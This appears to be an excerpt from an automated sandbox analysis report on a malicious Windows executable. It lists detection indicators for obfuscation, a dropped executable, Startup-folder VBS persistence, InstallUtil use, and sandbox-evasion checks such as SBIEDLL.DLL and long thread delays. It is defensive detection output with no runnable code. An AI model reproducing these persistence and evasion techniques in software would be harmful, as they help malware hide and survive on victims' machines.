                      Source: Binary string: protobuf-net.pdb source: Ref#60031796.exe, 00000000.00000002.2357319019.0000000003C68000.00000004.00000800.00020000.00000000.sdmp, Ref#60031796.exe, 00000000.00000002.2367253586.00000000070F0000.00000004.08000000.00040000.00000000.sdmp, Ref#60031796.exe, 00000000.00000002.2357319019.0000000003E32000.00000004.00000800.00020000.00000000.sdmp

                      Data Obfuscation

                      barindex
                      Source: 0.2.Ref#60031796.exe.70f0000.8.raw.unpack, TypeModel.cs.Net Code: TryDeserializeList
                      Source: 0.2.Ref#60031796.exe.70f0000.8.raw.unpack, ListDecorator.cs.Net Code: Read
                      Source: 0.2.Ref#60031796.exe.70f0000.8.raw.unpack, TypeSerializer.cs.Net Code: CreateInstance
                      Source: 0.2.Ref#60031796.exe.70f0000.8.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateInstance
                      Source: 0.2.Ref#60031796.exe.70f0000.8.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateIfNull
                      Source: 0.2.Ref#60031796.exe.3e323f8.3.raw.unpack, TypeModel.cs.Net Code: TryDeserializeList
                      Source: 0.2.Ref#60031796.exe.3e323f8.3.raw.unpack, ListDecorator.cs.Net Code: Read
                      Source: 0.2.Ref#60031796.exe.3e323f8.3.raw.unpack, TypeSerializer.cs.Net Code: CreateInstance
                      Source: 0.2.Ref#60031796.exe.3e323f8.3.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateInstance
                      Source: 0.2.Ref#60031796.exe.3e323f8.3.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateIfNull
                      Source: Yara matchFile source: 0.2.Ref#60031796.exe.7080000.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Ref#60031796.exe.3d54598.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000002.2367043467.0000000007080000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.2347570758.0000000002C5E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.2357319019.0000000003C68000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: Ref#60031796.exe PID: 1012, type: MEMORYSTR
                      Source: C:\Users\user\Desktop\Ref#60031796.exeCode function: 0_2_06F459D3 push cs; retf 0_2_06F459D6
                      Source: C:\Users\user\Desktop\Ref#60031796.exeCode function: 0_2_06F753DB push es; retf 0_2_06F753DC
                      Source: C:\Users\user\Desktop\Ref#60031796.exeCode function: 0_2_06F7D9CF push esi; iretd 0_2_06F7D9E5
                      Source: C:\Users\user\Desktop\Ref#60031796.exeCode function: 0_2_06FD6B28 push FFFFFF8Bh; iretd 0_2_06FD6B2F
                      Source: C:\Users\user\Desktop\Ref#60031796.exeCode function: 0_2_06FD0006 push eax; iretd 0_2_06FD0031
                      Source: C:\Users\user\Desktop\Ref#60031796.exeCode function: 0_2_06FD69EC push FFFFFF8Bh; ret 0_2_06FD69F0
                      Source: C:\Users\user\Desktop\Ref#60031796.exeCode function: 0_2_06FD69B4 push FFFFFF8Bh; ret 0_2_06FD69B6
                      Source: C:\Users\user\Desktop\Ref#60031796.exeCode function: 0_2_0707B6C3 push cs; ret 0_2_0707B6C9
                      Source: C:\Users\user\Desktop\Ref#60031796.exeCode function: 0_2_07148998 push eax; ret 0_2_07148999
                      Source: C:\Users\user\Desktop\Ref#60031796.exeCode function: 0_2_07149800 pushfd ; retf 0_2_07149801
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 3_2_00CF0434 push ebx; retf 0000h3_2_00CF0462
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 3_2_00CF0C45 push ebx; retf 3_2_00CF0C52
                      Source: C:\Users\user\Desktop\Ref#60031796.exeFile created: C:\Users\user\AppData\Roaming\vdvfyt.exeJump to dropped file

                      Boot Survival

                      barindex
                      Source: C:\Users\user\Desktop\Ref#60031796.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vdvfyt.vbsJump to dropped file
                      Source: C:\Users\user\Desktop\Ref#60031796.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vdvfyt.vbsJump to behavior
                      Source: C:\Users\user\Desktop\Ref#60031796.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vdvfyt.vbsJump to behavior
                      Source: C:\Users\user\Desktop\Ref#60031796.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#60031796.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#60031796.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#60031796.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#60031796.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#60031796.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#60031796.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#60031796.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#60031796.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#60031796.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#60031796.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#60031796.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#60031796.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#60031796.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#60031796.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#60031796.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#60031796.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#60031796.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#60031796.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#60031796.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#60031796.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#60031796.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#60031796.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#60031796.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#60031796.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#60031796.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#60031796.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#60031796.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#60031796.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#60031796.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#60031796.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#60031796.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#60031796.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#60031796.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#60031796.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#60031796.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#60031796.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#60031796.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#60031796.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#60031796.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#60031796.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#60031796.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#60031796.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#60031796.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#60031796.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#60031796.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#60031796.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#60031796.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#60031796.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#60031796.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#60031796.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#60031796.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#60031796.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#60031796.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#60031796.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#60031796.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#60031796.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#60031796.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#60031796.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                      Malware Analysis System Evasion

                      barindex
                      Source: Yara matchFile source: Process Memory Space: Ref#60031796.exe PID: 1012, type: MEMORYSTR
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                      Source: Ref#60031796.exe, 00000000.00000002.2347570758.0000000002C5E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
                      Source: C:\Users\user\Desktop\Ref#60031796.exeMemory allocated: 11E0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\Ref#60031796.exeMemory allocated: 2BB0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\Ref#60031796.exeMemory allocated: 4BB0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: CF0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 2860000 memory reserve | memory write watchJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 4860000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeMemory allocated: 2F10000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeMemory allocated: 3140000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeMemory allocated: 2F40000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\Ref#60031796.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
